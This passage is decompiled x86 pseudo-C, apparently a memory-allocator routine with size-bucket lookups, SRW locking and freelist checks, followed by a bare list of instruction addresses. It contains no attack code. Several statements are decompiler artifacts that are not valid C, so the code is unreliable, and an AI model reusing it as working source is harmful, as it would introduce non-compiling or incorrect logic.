							__eflags = _t383 - _t518;
							if(_t383 < _t518) {
								goto L162;
							} else {
								_t313 =  *(_t585 + 2) & 0x000000ff;
								__eflags = _t313 - 2;
								_v84 = _t585;
								_v60 = _t383;
								if(_t313 == 2) {
									_t421 = 0x20;
									__eflags = _t383;
									if(_t383 != 0) {
										asm("bsr ecx, ebx");
										_t421 = 0x3f;
										__eflags = 0x20;
									}
									_t315 = 0x20 - _t421;
									_t316 = (_t383 >> ( *(0xd35a40 - _t421) & 0x000000ff) & 0x00000007) + _t315 * 8;
									__eflags = ( *(0xd35a44 + _t315 * 4) & _t383) - 1;
									asm("sbb eax, 0xffffffff");
									_t51 = _t316 + 0xd3580c; // 0x0
									_t317 =  *((_t383 >> ( *(0xd35a40 - _t421) & 0x000000ff) & 0x00000007) + _t315 * 8 + _t51) & 0x0000ffff;
									_v80 = _t317;
								} else {
									__eflags = _t313 - 1;
									if(_t313 != 1) {
										_t554 = 0x20;
										__eflags = _t383;
										if(_t383 != 0) {
											asm("bsr edx, ebx");
											_t554 = 0x3f;
											__eflags = 0x20;
										}
										_t371 = 0x20 - _t554;
										_t502 =  *(0xd35a44 + _t371 * 4) & _t383;
										_t372 = (_t383 >> ( *(0xd35a40 - _t554) & 0x000000ff) & 0x00000007) + _t371 * 8;
										__eflags = _t502 - 1;
										asm("sbb eax, 0xffffffff");
										_t58 = _t372 + 0xd3580c; // 0x0
										_t317 =  *((_t383 >> ( *(0xd35a40 - _t554) & 0x000000ff) & 0x00000007) + _t371 * 8 + _t58) & 0x0000ffff;
										_t383 - 0x41 = _t317 - 0x76;
										_v80 = (_t554 & 0xffffff00 | _t317 - 0x00000076 > 0x00000000) & (_t502 & 0xffffff00 | _t383 - 0x00000041 >= 0x00000000) & 0x000000ff | _t317;
										_t585 = _v84;
									} else {
										_t45 = _t383 - 0x101; // -256
										_t506 = _t45;
										_t373 = _t383;
										__eflags = _t506 - 0xfefe;
										if(_t506 <= 0xfefe) {
											__eflags = _t383 == 1;
											if(_t383 == 1) {
												_t513 = 0x20;
											} else {
												asm("bsr ecx, eax");
												_t513 = _t506 ^ 0x0000001f;
											}
											__eflags = 1 - _t383;
											_t373 =  <  ? 1 <<  ~_t513 : 0xbadbb1 >> 2;
										}
										_t396 = _t565;
										_t601 = 0x20;
										__eflags = _t373;
										if(_t373 != 0) {
											asm("bsr esi, eax");
											_t601 = 0x3f;
											__eflags = 0x20;
										}
										_t558 = 0x20 - _t601;
										_t559 = (_t373 >> ( *(0xd35a40 - _t601) & 0x000000ff) & 0x00000007) + _t558 * 8;
										__eflags = ( *(0xd35a44 + _t558 * 4) & _t373) - 1;
										asm("sbb edx, 0xffffffff");
										_t127 = _t559 + 0xd3580c; // 0x0
										_t512 =  *(_t559 + _t127) & 0x0000ffff;
										_t373 - 0x41 = _t512 - 0x76;
										_t317 = (_t559 & 0xffffff00 | _t512 - 0x00000076 > 0x00000000) & (_t373 & 0xffffff00 | _t373 - 0x00000041 >= 0x00000000) & 0x000000ff | _t512;
										__eflags = _t317;
										_v80 = _t317;
										_t585 = _v84;
										_t565 = _t396;
									}
								}
								_v49 = 0;
								_v56 = 0xffffffff;
								_t518 =  *_t585 & 0x000000ff;
								__eflags = _t518 - 2;
								if(_t518 == 2) {
									_t317 =  *0xd43d89 & 0x000000ff;
									__eflags = _t317 & 0x00000001;
									if((_t317 & 0x00000001) != 0) {
										_t395 = _t518;
										_t317 = L00CD7BD0(_t395, _t639);
										_t518 = _t395;
									}
								}
								_v64 = _t565;
								__eflags = _t565 - 0x4000;
								_v76 = _t518;
								if(_t565 > 0x4000) {
									L93:
									_t383 = _t585;
									_t585 = (_v80 & 0x0000ffff) << 5;
									_t181 = _t383 + 0x40; // 0x40
									_t569 = _t181;
									__imp__TryAcquireSRWLockExclusive(_t569);
									__eflags = _t317;
									if(_t317 == 0) {
										L00CC8B90(_t317, _t569);
									}
									_v76 = _t569;
									_t426 = _t383 + _t585 + 0x48;
									__eflags = _v68 - 0x4000;
									if(_v68 > 0x4000) {
										L154:
										_t318 =  &_v53;
										goto L156;
									} else {
										_t321 =  *_t426;
										_t572 =  *_t321;
										__eflags = _t572;
										if(_t572 == 0) {
											goto L154;
										}
										_v53 = 0;
										_t518 =  *_t572;
										__eflags = _t518;
										_v84 = _t572;
										if(_t518 == 0) {
											_t444 = 0;
											__eflags = 0;
											L143:
											_t570 = _v76;
											 *_t321 = _t444;
											_t445 = _t321[3];
											_t518 = _t445 + 0x00000002 & 0x00003ffe;
											_t321[3] = _t445 & 0xffffc001 | _t445 + 0x00000002 & 0x00003ffe;
											_t585 = _v88;
											goto L146;
										}
										_t589 =  *(_v88 + 0x48 + _t585 + 0xc);
										_t444 = _t518;
										asm("bswap ecx");
										_t386 = _t444 ^ _t572;
										__eflags = (_t444 ^ _t572) - 0x1fffff;
										if((_t444 ^ _t572) > 0x1fffff) {
											goto L153;
										}
										_t386 = _t444 & 0x001fc000;
										__eflags = _t444 & 0x001fc000;
										if((_t444 & 0x001fc000) == 0) {
											goto L153;
										}
										asm("prefetcht0 [ecx]");
										goto L143;
									}
								} else {
									__eflags =  *((char*)(_t585 + 3));
									if( *((char*)(_t585 + 3)) == 0) {
										goto L93;
									}
									_t361 =  *0xd43e38; // 0x0
									_t579 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t361 * 4)) + 0xa0));
									__eflags = _t579 - 2;
									if(_t579 < 2) {
										_t383 = _t518;
										_t518 = _v80 & 0x0000ffff;
										_push( &_v56);
										_push(_v80 & 0x0000ffff);
										_t301 = E00CD9960(_t585);
										__eflags = _t301;
										if(_t301 != 0) {
											L85:
											_t565 =  *((intOrPtr*)(_t585 + 0x10)) + _t301;
											__eflags =  *((char*)(_t585 + 6));
											if( *((char*)(_t585 + 6)) != 0) {
												__eflags = _t301 & 0x00000fff;
												if((_t301 & 0x00000fff) == 0) {
													_t518 = _t301 & 0xffe00000;
													_t443 = (_t301 >> 0x00000009 & 0x00000ff8) + (_t301 & 0xffe00000) + 0x2000;
												} else {
													_t174 = _t301 - 4; // -4
													_t443 = _t174;
												}
												 *_t443 = 1;
											}
											__eflags = _t383 - 2;
											if(_t383 == 2) {
												_t435 = _t301 >> 0x15;
												__eflags =  *((short*)(_t435 + _t435 + 0xd42d24)) - 0xfffe;
												if( *((short*)(_t435 + _t435 + 0xd42d24)) == 0xfffe) {
													_t585 = _t301 & 0xffe00000;
													_t518 = 3 << (_t301 >> 0x00000002 & 0x0000001e);
													_t301 = _t301 >> 0x00000005 & 0x0000fffc;
													asm("lock or [eax+esi+0x4000], edx");
												}
											}
											L90:
											__eflags = _v76 & _t565;
											if((_v76 & _t565) != 0) {
												goto L163;
											}
											goto L91;
										}
										L116:
										_t392 = _v76 & 0x0000ffff;
										L119:
										_t383 = _t392 << 5;
										_t364 = _t585;
										_t585 = _t585 + _t383 + 0x48;
										_t210 = _t364 + 0x40; // 0x40
										_t580 = _t210;
										__imp__TryAcquireSRWLockExclusive(_t580);
										__eflags = _t364;
										if(_t364 == 0) {
											L00CC8B90(_t364, _t580);
										}
										_v72 = _t580;
										_t321 =  *_t585;
										_t581 =  *_t321;
										__eflags = _t581;
										if(_t581 == 0) {
											_t318 =  &_v49;
											_t426 = _t585;
											L156:
											_t301 = L00CD87D0(_t426, _v88, 0, _v64, _v68, _t318);
											_v104 = _t301;
											__eflags = _t301;
											if(_t301 == 0) {
												__imp__ReleaseSRWLockExclusive(_v76);
												_t565 = 0;
												goto L90;
											}
											_t531 = _v84;
											_t518 = _t531 >> 0x00000009 & 0x00000fe0;
											_t321 = (_t531 >> 0x00000009 & 0x00000fe0) + (_t531 & 0xffe00000) - (( *((_t531 >> 0x00000009 & 0x00000fe0) + (_t531 & 0xffe00000) + 0x101e) & 0x3f) << 5) + 0x1000;
											_t585 = _v88;
											_t570 = _v76;
											goto L146;
										} else {
											_v49 = 0;
											_t518 =  *_t581;
											__eflags = _t518;
											_v80 = _t581;
											if(_t518 == 0) {
												_t489 = 0;
												__eflags = 0;
												L145:
												_t585 = _v84;
												_t570 = _v72;
												 *_t321 = _t489;
												_t490 = _t321[3];
												_t518 = _t490 + 0x00000002 & 0x00003ffe;
												_t492 = _t490 & 0xffffc001 | _t490 + 0x00000002 & 0x00003ffe;
												__eflags = _t492;
												_t321[3] = _t492;
												L146:
												_t323 =  *((intOrPtr*)(_t585 + 0x117c)) +  *((intOrPtr*)(_t321[2] + 0xc));
												 *((intOrPtr*)(_t585 + 0x117c)) = _t323;
												_t433 =  *((intOrPtr*)(_t585 + 0x1180));
												__eflags = _t433 - _t323;
												_t324 =  >  ? _t433 : _t323;
												 *((intOrPtr*)(_t585 + 0x1180)) =  >  ? _t433 : _t323;
												__imp__ReleaseSRWLockExclusive(_t570);
												_t383 = _v84 & 0x000000ff;
												_t301 = _v88;
												goto L85;
											}
											_t589 =  *(_v84 + 0x48 + _t383 + 0xc);
											_t489 = _t518;
											asm("bswap ecx");
											_t386 = _t489 ^ _t581;
											__eflags = (_t489 ^ _t581) - 0x1fffff;
											if((_t489 ^ _t581) > 0x1fffff) {
												L153:
												asm("pcmpeqd xmm0, xmm0");
												asm("movdqa [esp+0x30], xmm0");
												_t565 =  &_v52;
												_t450 = _t565;
												_push(0);
												_push(_t518);
												L102:
												E00C90790(E00CC88D0(_t450));
												_t605 = _t605 + 4;
												E00CC8960(_t589, _t639, _t565, "first");
												L103:
												_t383 = E00CD4240(_t386, _t518, _t565);
												__eflags = _t565;
												if(_t565 != 0) {
													L4:
													_t590 = _t565;
													L5:
													_t585 = _t590 +  *((intOrPtr*)(_t383 + 0xc));
													if(_t585 < _t565) {
														L159:
														asm("int3");
														asm("ud2");
														goto L160;
													}
													_t329 =  *(_t383 + 2) & 0x000000ff;
													_v64 = _t585;
													if(_t329 == 2) {
														_t452 = 0x20;
														__eflags = _t585;
														if(_t585 != 0) {
															asm("bsr ecx, esi");
															_t452 = 0x3f;
															__eflags = 0x20;
														}
														_t331 = 0x20 - _t452;
														_t332 = (_t585 >> ( *(0xd35a40 - _t452) & 0x000000ff) & 0x00000007) + _t331 * 8;
														__eflags = ( *(0xd35a44 + _t331 * 4) & _t585) - 1;
														asm("sbb eax, 0xffffffff");
														_t31 = _t332 + 0xd3580c; // 0x0
														_t585 =  *((_t585 >> ( *(0xd35a40 - _t452) & 0x000000ff) & 0x00000007) + _t331 * 8 + _t31) & 0x0000ffff;
													} else {
														if(_t329 != 1) {
															_t543 = 0x20;
															__eflags = _t585;
															if(_t585 != 0) {
																asm("bsr edx, esi");
																_t543 = 0x3f;
																__eflags = 0x20;
															}
															_t575 = _t585;
															_t349 = 0x20 - _t543;
															_t475 =  *(0xd35a44 + _t349 * 4) & _t575;
															_t350 = (_t585 >> ( *(0xd35a40 - _t543) & 0x000000ff) & 0x00000007) + _t349 * 8;
															__eflags = _t475 - 1;
															asm("sbb eax, 0xffffffff");
															_t37 = _t350 + 0xd3580c; // 0x0
															_t351 =  *((_t585 >> ( *(0xd35a40 - _t543) & 0x000000ff) & 0x00000007) + _t349 * 8 + _t37) & 0x0000ffff;
															_t575 - 0x41 = _t351 - 0x76;
															_t585 = (_t543 & 0xffffff00 | _t351 - 0x00000076 > 0x00000000) & (_t475 & 0xffffff00 | _t575 - 0x00000041 >= 0x00000000) & 0x000000ff | _t351;
														} else {
															_t14 = _t585 - 0x101; // -257
															_t477 = _t14;
															_t352 = _t585;
															if(_t477 <= 0xfefe) {
																if(_t585 == 1) {
																	_t484 = 0x20;
																} else {
																	asm("bsr ecx, eax");
																	_t484 = _t477 ^ 0x0000001f;
																}
																_t352 =  <  ? 1 <<  ~_t484 : 0xbadbb1 >> 2;
															}
															_t595 = 0x20;
															if(_t352 != 0) {
																asm("bsr esi, eax");
																_t595 = 0x3f;
															}
															_t548 = (_t352 >> ( *(0xd35a40 - _t595) & 0x000000ff) & 0x00000007) + (0x20 - _t595) * 8;
															asm("sbb edx, 0xffffffff");
															_t72 = _t548 + 0xd3580c; // 0x0
															_t585 = ((_t352 >> ( *(0xd35a40 - _t595) & 0x000000ff) & 0x00000007) + (0x00000020 - _t595) * 0x00000008 & 0xffffff00 | ( *((_t352 >> ( *(0xd35a40 - _t595) & 0x000000ff) & 0x00000007) + (0x20 - _t595) * 8 + _t72) & 0x0000ffff) - 0x00000076 > 0x00000000) & (_t352 & 0xffffff00 | _t352 - 0x00000041 >= 0x00000000) & 0x000000ff |  *((_t352 >> ( *(0xd35a40 - _t595) & 0x000000ff) & 0x00000007) + (0x20 - _t595) * 8 + _t72) & 0x0000ffff;
														}
													}
													_v45 = 0;
													_v52 = 0xffffffff;
													_t518 =  *_t383 & 0x000000ff;
													_v76 = _t518;
													if(_t518 == 2) {
														_t333 =  *0xd43d89 & 0x000000ff;
														__eflags = _t333 & 0x00000001;
														if((_t333 & 0x00000001) != 0) {
															L00CD7BD0(_t383, _t639);
														}
													}
													_v80 = _t383;
													if( *((char*)(_t383 + 3)) == 0) {
														_t334 = _t383;
														_t383 = (_t585 & 0x0000ffff) << 5;
														goto L128;
													} else {
														_v72 = _t585 & 0x0000ffff;
														_t340 =  *0xd43e38; // 0x0
														_t574 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t340 * 4)) + 0xa0));
														if(_t574 < 2) {
															_push( &_v52);
															_push(_v72);
															_t301 = E00CD9960(_t383);
															L60:
															_t518 = _v72 & 0x000000ff;
															if(_t301 == 0) {
																_t390 = _v68;
																L127:
																_t383 = _t390 << 5;
																__eflags = _t383;
																_t334 = _v76;
																L128:
																_t585 = _t334 + _t383 + 0x48;
																_t220 = _t334 + 0x40; // 0x40
																_t565 = _t220;
																__imp__TryAcquireSRWLockExclusive(_t565);
																__eflags = _t334;
																if(_t334 == 0) {
																	L00CC8B90(_t334, _t565);
																}
																_t308 =  *_t585;
																_t456 =  *_t308;
																__eflags = _t456;
																if(_t456 == 0) {
																	L150:
																	_t301 = L00CD87D0(_t585, _v88, 0, _v72, 0x4000,  &_v53);
																	_v100 = _t301;
																	__eflags = _t301;
																	if(_t301 == 0) {
																		goto L164;
																	}
																	_t308 = (_v80 >> 0x00000009 & 0x00000fe0) + (_v80 & 0xffe00000) - (( *((_v80 >> 0x00000009 & 0x00000fe0) + (_v80 & 0xffe00000) + 0x101e) & 0x3f) << 5) + 0x1000;
																	_t383 = _v88;
																	goto L137;
																} else {
																	_v49 = 0;
																	_t518 =  *_t456;
																	__eflags = _t518;
																	_v76 = _t456;
																	if(_t518 == 0) {
																		_t457 = 0;
																		__eflags = 0;
																		L136:
																		_t383 = _v84;
																		 *_t308 = _t457;
																		_t460 = _t308[3] & 0xffffc001 | _t308[3] + 0x00000002 & 0x00003ffe;
																		__eflags = _t460;
																		_t308[3] = _t460;
																		L137:
																		_t310 =  *((intOrPtr*)(_t383 + 0x117c)) +  *((intOrPtr*)(_t308[2] + 0xc));
																		 *((intOrPtr*)(_t383 + 0x117c)) = _t310;
																		_t410 =  *((intOrPtr*)(_t383 + 0x1180));
																		__eflags = _t410 - _t310;
																		_t311 =  >  ? _t410 : _t310;
																		 *((intOrPtr*)(_t383 + 0x1180)) =  >  ? _t410 : _t310;
																		__imp__ReleaseSRWLockExclusive(_t565);
																		_t518 = _v88 & 0x000000ff;
																		_t301 = _v84;
																		goto L61;
																	}
																	_t589 = _t456;
																	_v68 =  *(_v84 + 0x48 + _t383 + 0xc);
																	_t457 = _t518;
																	asm("bswap ecx");
																	_t386 = _t457 ^ _t589;
																	__eflags = (_t457 ^ _t589) - 0x1fffff;
																	if((_t457 ^ _t589) > 0x1fffff) {
																		L152:
																		asm("pcmpeqd xmm0, xmm0");
																		asm("movdqa [esp+0x30], xmm0");
																		_t573 =  &_v48;
																		_t335 = E00CC88D0(_t573, "first", _t518, 0);
																		_push(_t573);
																		E00C90790(_t335);
																		_t605 = _t605 + 4;
																		E00CC8960(_v80, _t639);
																		goto L153;
																	}
																	_t386 = _t457 & 0x001fc000;
																	__eflags = _t457 & 0x001fc000;
																	if((_t457 & 0x001fc000) == 0) {
																		goto L152;
																	}
																	asm("prefetcht0 [ecx]");
																	goto L136;
																}
															}
															L61:
															_t566 =  *((intOrPtr*)(_t383 + 0x10)) + _t301;
															if( *((char*)(_t383 + 6)) != 0) {
																if((_t301 & 0x00000fff) == 0) {
																	_t383 = _t518;
																	_t420 = (_t301 >> 0x00000009 & 0x00000ff8) + (_t301 & 0xffe00000) + 0x2000;
																} else {
																	_t420 = _t301 - 4;
																}
																 *_t420 = 1;
															}
															if(_t518 == 2 &&  *((short*)((_t301 >> 0x15) + (_t301 >> 0x15) + 0xd42d24)) == 0xfffe) {
																_t585 = _t301 & 0xffe00000;
																_t518 = 3 << (_t301 >> 0x00000002 & 0x0000001e);
																_t301 = _t301 >> 0x00000005 & 0x0000fffc;
																asm("lock or [eax+esi+0x4000], edx");
															}
															goto L91;
														}
														 *((intOrPtr*)(_t574 + 8)) =  *((intOrPtr*)(_t574 + 8)) + 1;
														asm("adc dword [edi+0xc], 0x0");
														_t390 = _t585 & 0x0000ffff;
														_t628 =  *0xd42d20 - _t390; // 0x1f
														if(_t628 < 0) {
															 *((intOrPtr*)(_t574 + 0x28)) =  *((intOrPtr*)(_t574 + 0x28)) + 1;
															asm("adc dword [edi+0x2c], 0x0");
															 *((intOrPtr*)(_t574 + 0x18)) =  *((intOrPtr*)(_t574 + 0x18)) + 1;
															asm("adc dword [edi+0x1c], 0x0");
															goto L127;
														}
														_t343 =  *(_t574 + 0x58 + _t390 * 8);
														if(_t343 == 0) {
															 *((intOrPtr*)(_t574 + 0x20)) =  *((intOrPtr*)(_t574 + 0x20)) + 1;
															asm("adc dword [edi+0x24], 0x0");
															 *((intOrPtr*)(_t574 + 0x18)) =  *((intOrPtr*)(_t574 + 0x18)) + 1;
															asm("adc dword [edi+0x1c], 0x0");
															E00CC85A0(_t574, _t390);
															_t343 =  *(_t574 + 0x58 + _t390 * 8);
															__eflags = _t343;
															if(_t343 != 0) {
																L55:
																_t585 =  *(_t574 + 0x5e + _t390 * 8) & 0x0000ffff;
																_t518 = _t343;
																_t345 =  *_t343;
																if(_t345 == 0) {
																	_t470 = 0;
																	__eflags = 0;
																	L59:
																	 *((char*)(_t574 + 0x5c + _t390 * 8)) =  *((char*)(_t574 + 0x5c + _t390 * 8)) - 1;
																	 *(_t574 + 0x58 + _t390 * 8) = _t470;
																	_v52 = _t585;
																	 *_t574 =  *_t574 - ( *(_t574 + 0x5e + _t390 * 8) & 0x0000ffff);
																	_t383 = _v80;
																	_t301 = _t518;
																	goto L60;
																}
																_t470 = _t345;
																asm("bswap ecx");
																if((_t470 & 0x001fc000) == 0) {
																	L101:
																	asm("pcmpeqd xmm0, xmm0");
																	asm("movdqa [esp+0x30], xmm0");
																	_t565 =  &_v44;
																	_t450 = _t565;
																	_push(0);
																	_push(_t345);
																	goto L102;
																}
																asm("prefetcht0 [ecx]");
																goto L59;
															}
															goto L127;
														}
														 *((intOrPtr*)(_t574 + 0x10)) =  *((intOrPtr*)(_t574 + 0x10)) + 1;
														asm("adc dword [edi+0x14], 0x0");
														goto L55;
													}
												}
												L104:
												_t590 = 1;
												goto L5;
											}
											_t386 = _t489 & 0x001fc000;
											__eflags = _t489 & 0x001fc000;
											if((_t489 & 0x001fc000) == 0) {
												goto L153;
											}
											asm("prefetcht0 [ecx]");
											goto L145;
										}
									}
									 *((intOrPtr*)(_t579 + 8)) =  *((intOrPtr*)(_t579 + 8)) + 1;
									asm("adc dword [edi+0xc], 0x0");
									_t366 = _v80;
									_t392 = _t366 & 0x0000ffff;
									__eflags =  *0xd42d20 - _t366; // 0x1f
									if(__eflags < 0) {
										 *((intOrPtr*)(_t579 + 0x28)) =  *((intOrPtr*)(_t579 + 0x28)) + 1;
										asm("adc dword [edi+0x2c], 0x0");
										 *((intOrPtr*)(_t579 + 0x18)) =  *((intOrPtr*)(_t579 + 0x18)) + 1;
										asm("adc dword [edi+0x1c], 0x0");
										goto L119;
									}
									_t367 =  *(_t579 + 0x58 + _t392 * 8);
									__eflags = _t367;
									if(_t367 == 0) {
										 *((intOrPtr*)(_t579 + 0x20)) =  *((intOrPtr*)(_t579 + 0x20)) + 1;
										asm("adc dword [edi+0x24], 0x0");
										 *((intOrPtr*)(_t579 + 0x18)) =  *((intOrPtr*)(_t579 + 0x18)) + 1;
										asm("adc dword [edi+0x1c], 0x0");
										E00CC85A0(_t579, _t392);
										_t367 =  *(_t579 + 0x58 + _t392 * 8);
										__eflags = _t367;
										if(_t367 != 0) {
											L80:
											_t589 =  *(_t579 + 0x5e + _t392 * 8) & 0x0000ffff;
											_t518 = _t367;
											_t345 =  *_t367;
											__eflags = _t345;
											if(_t345 == 0) {
												_t497 = 0;
												__eflags = 0;
												L84:
												 *((char*)(_t579 + 0x5c + _t392 * 8)) =  *((char*)(_t579 + 0x5c + _t392 * 8)) - 1;
												 *(_t579 + 0x58 + _t392 * 8) = _t497;
												_v56 = _t589;
												 *_t579 =  *_t579 - ( *(_t579 + 0x5e + _t392 * 8) & 0x0000ffff);
												_t585 = _v84;
												_t301 = _t518;
												_t383 = _v76 & 0x000000ff;
												__eflags = _t301;
												if(_t301 == 0) {
													goto L116;
												}
												goto L85;
											}
											_t497 = _t345;
											asm("bswap ecx");
											__eflags = _t497 & 0x001fc000;
											if((_t497 & 0x001fc000) == 0) {
												goto L101;
											}
											asm("prefetcht0 [ecx]");
											goto L84;
										}
										_t585 = _v84;
										goto L119;
									}
									 *((intOrPtr*)(_t579 + 0x10)) =  *((intOrPtr*)(_t579 + 0x10)) + 1;
									asm("adc dword [edi+0x14], 0x0");
									goto L80;
								}
							}
						}
					}
				}
				_t382 = __ecx - 1;
				_t301 = _t382 & 0xffffff00 | (__ecx & _t382) == 0x00000000;
				if(((__ecx & 0xffffff00 | __ecx != 0x00000000) & (_t382 & 0xffffff00 | (__ecx & _t382) == 0x00000000)) == 0) {
					asm("int3");
					asm("ud2");
					goto L159;
				}
				_t386 =  *0xd515c0; // 0xd51600
				if(_t386 == 0) {
					goto L103;
				}
				if(__edx == 0) {
					goto L104;
				}
				goto L4;
			}

0x00cd29d0
0x00cd29d0
0x00cd29d9
0x00cd29dc
0x00cd29de
0x00cd29e0
0x00cd29e7
0x00cd29ee
0x00cd2a6a
0x00cd2a70
0x00cd2a72
0x00cd30b2
0x00cd30b2
0x00cd2a78
0x00cd2a7b
0x00cd2a7f
0x00cd2a81
0x00cd2a84
0x00cd2a86
0x00cd2a89
0x00cd2a8b
0x00cd3513
0x00cd3513
0x00cd3514
0x00000000
0x00cd2a91
0x00cd2a91
0x00cd2a97
0x00cd3516
0x00cd3516
0x00cd3517
0x00cd3519
0x00cd3519
0x00cd351a
0x00cd351c
0x00cd351c
0x00cd351d
0x00cd351f
0x00cd3520
0x00cd3526
0x00cd2fba
0x00cd2fc0
0x00cd2fce
0x00cd2fce
0x00cd2a9d
0x00cd2a9f
0x00cd30b9
0x00cd2aa5
0x00cd2aa5
0x00cd2aa5
0x00cd2aa7
0x00cd2aaa
0x00cd2ab0
0x00cd2ab9
0x00cd2abb
0x00cd2abd
0x00cd2abf
0x00cd2ac5
0x00cd2ac5
0x00cd2ac6
0x00cd2b77
0x00cd2acc
0x00cd2acc
0x00cd2acf
0x00cd2acf
0x00cd2b7c
0x00cd2b83
0x00cd2b83
0x00cd2b83
0x00cd2b85
0x00cd2b87
0x00cd2b89
0x00cd3401
0x00cd3402
0x00000000
0x00cd3402
0x00000000
0x00cd2ab2
0x00cd2ab2
0x00cd2b8f
0x00cd2b8f
0x00cd2b9a
0x00cd2b9d
0x00cd2b9f
0x00cd30dc
0x00cd2ba5
0x00cd2ba5
0x00cd2ba5
0x00cd2ba7
0x00cd2ba9
0x00cd2bab
0x00000000
0x00cd2bb1
0x00cd2bb1
0x00cd2bb5
0x00cd2bb8
0x00cd2bbc
0x00cd2bc0
0x00cd2bf4
0x00cd2bf9
0x00cd2bfb
0x00cd2bfd
0x00cd2c00
0x00cd2c00
0x00cd2c00
0x00cd2c03
0x00cd2c1f
0x00cd2c22
0x00cd2c25
0x00cd2c28
0x00cd2c28
0x00cd2c30
0x00cd2bc2
0x00cd2bc2
0x00cd2bc5
0x00cd2c3e
0x00cd2c43
0x00cd2c45
0x00cd2c47
0x00cd2c4a
0x00cd2c4a
0x00cd2c4a
0x00cd2c5b
0x00cd2c67
0x00cd2c69
0x00cd2c6c
0x00cd2c6f
0x00cd2c72
0x00cd2c72
0x00cd2c80
0x00cd2c8e
0x00cd2c92
0x00cd2bc7
0x00cd2bc7
0x00cd2bc7
0x00cd2bcd
0x00cd2bcf
0x00cd2bd5
0x00cd2bdd
0x00cd2bde
0x00cd2e3b
0x00cd2be4
0x00cd2be4
0x00cd2be7
0x00cd2be7
0x00cd2e53
0x00cd2e55
0x00cd2e55
0x00cd2e58
0x00cd2e5f
0x00cd2e64
0x00cd2e66
0x00cd2e68
0x00cd2e6b
0x00cd2e6b
0x00cd2e6b
0x00cd2e7c
0x00cd2e8a
0x00cd2e8d
0x00cd2e90
0x00cd2e93
0x00cd2e93
0x00cd2ea1
0x00cd2ead
0x00cd2ead
0x00cd2eaf
0x00cd2eb3
0x00cd2eb7
0x00cd2eb7
0x00cd2bc5
0x00cd2eb9
0x00cd2ebe
0x00cd2ec6
0x00cd2ec9
0x00cd2ecc
0x00cd30e6
0x00cd30ed
0x00cd30ef
0x00cd30f5
0x00cd30f7
0x00cd30fc
0x00cd30fc
0x00cd30ef
0x00cd2ed2
0x00cd2ed6
0x00cd2edc
0x00cd2ee0
0x00cd2fdc
0x00cd2fdc
0x00cd2fe3
0x00cd2fe6
0x00cd2fe6
0x00cd2fea
0x00cd2ff0
0x00cd2ff2
0x00cd2ff6
0x00cd2ff6
0x00cd2ffb
0x00cd3002
0x00cd3005
0x00cd300d
0x00cd34ab
0x00cd34ab
0x00000000
0x00cd3013
0x00cd3013
0x00cd3015
0x00cd3017
0x00cd3019
0x00000000
0x00000000
0x00cd301f
0x00cd3024
0x00cd3026
0x00cd3028
0x00cd302c
0x00cd333d
0x00cd333d
0x00cd333f
0x00cd333f
0x00cd3343
0x00cd3345
0x00cd334b
0x00cd3359
0x00cd335c
0x00000000
0x00cd335c
0x00cd3039
0x00cd303d
0x00cd303f
0x00cd3043
0x00cd3045
0x00cd304b
0x00000000
0x00000000
0x00cd3053
0x00cd3053
0x00cd3059
0x00000000
0x00000000
0x00cd305f
0x00000000
0x00cd305f
0x00cd2ee6
0x00cd2ee6
0x00cd2eea
0x00000000
0x00000000
0x00cd2ef0
0x00cd2eff
0x00cd2f05
0x00cd2f08
0x00cd315c
0x00cd315e
0x00cd3165
0x00cd3166
0x00cd3167
0x00cd316c
0x00cd316e
0x00cd2f88
0x00cd2f8b
0x00cd2f8d
0x00cd2f91
0x00cd2f93
0x00cd2f98
0x00cd33e3
0x00cd33f6
0x00cd2f9e
0x00cd2f9e
0x00cd2f9e
0x00cd2f9e
0x00cd2fa1
0x00cd2fa1
0x00cd2fa7
0x00cd2faa
0x00cd3105
0x00cd3108
0x00cd3111
0x00cd3119
0x00cd312c
0x00cd3131
0x00cd3136
0x00cd3136
0x00cd3111
0x00cd2fb0
0x00cd2fb0
0x00cd2fb4
0x00000000
0x00000000
0x00000000
0x00cd2fb4
0x00cd3174
0x00cd3174
0x00cd31a0
0x00cd31a0
0x00cd31a3
0x00cd31a7
0x00cd31aa
0x00cd31aa
0x00cd31ae
0x00cd31b4
0x00cd31b6
0x00cd31ba
0x00cd31ba
0x00cd31bf
0x00cd31c3
0x00cd31c5
0x00cd31c7
0x00cd31c9
0x00cd34b1
0x00cd34b5
0x00cd34b7
0x00cd34c6
0x00cd34cb
0x00cd34cf
0x00cd34d1
0x00cd3531
0x00cd3537
0x00000000
0x00cd3537
0x00cd34d3
0x00cd34e2
0x00cd34fb
0x00cd3500
0x00cd3504
0x00000000
0x00cd31cf
0x00cd31cf
0x00cd31d4
0x00cd31d6
0x00cd31d8
0x00cd31dc
0x00cd3362
0x00cd3362
0x00cd3364
0x00cd3364
0x00cd3368
0x00cd336c
0x00cd336e
0x00cd3374
0x00cd3380
0x00cd3380
0x00cd3382
0x00cd3385
0x00cd338e
0x00cd3391
0x00cd3397
0x00cd339d
0x00cd339f
0x00cd33a2
0x00cd33a9
0x00cd33af
0x00cd33b4
0x00000000
0x00cd33b4
0x00cd31e9
0x00cd31ed
0x00cd31ef
0x00cd31f3
0x00cd31f5
0x00cd31fb
0x00cd3493
0x00cd3493
0x00cd3497
0x00cd349d
0x00cd34a1
0x00cd34a3
0x00cd34a5
0x00cd307a
0x00cd3085
0x00cd308a
0x00cd308f
0x00cd3094
0x00cd3099
0x00cd309b
0x00cd309d
0x00cd2a1b
0x00cd2a1b
0x00cd2a1d
0x00cd2a1d
0x00cd2a22
0x00cd3510
0x00cd3510
0x00cd3511
0x00000000
0x00cd3511
0x00cd2a28
0x00cd2a2f
0x00cd2a33
0x00cd2adc
0x00cd2ae1
0x00cd2ae3
0x00cd2ae5
0x00cd2ae8
0x00cd2ae8
0x00cd2ae8
0x00cd2aeb
0x00cd2b07
0x00cd2b0a
0x00cd2b0d
0x00cd2b10
0x00cd2b10
0x00cd2a39
0x00cd2a3c
0x00cd2b22
0x00cd2b27
0x00cd2b29
0x00cd2b2b
0x00cd2b2e
0x00cd2b2e
0x00cd2b2e
0x00cd2b3b
0x00cd2b3f
0x00cd2b4b
0x00cd2b4d
0x00cd2b50
0x00cd2b53
0x00cd2b56
0x00cd2b56
0x00cd2b64
0x00cd2b70
0x00cd2a42
0x00cd2a42
0x00cd2a42
0x00cd2a48
0x00cd2a50
0x00cd2a59
0x00cd2c9b
0x00cd2a5f
0x00cd2a5f
0x00cd2a62
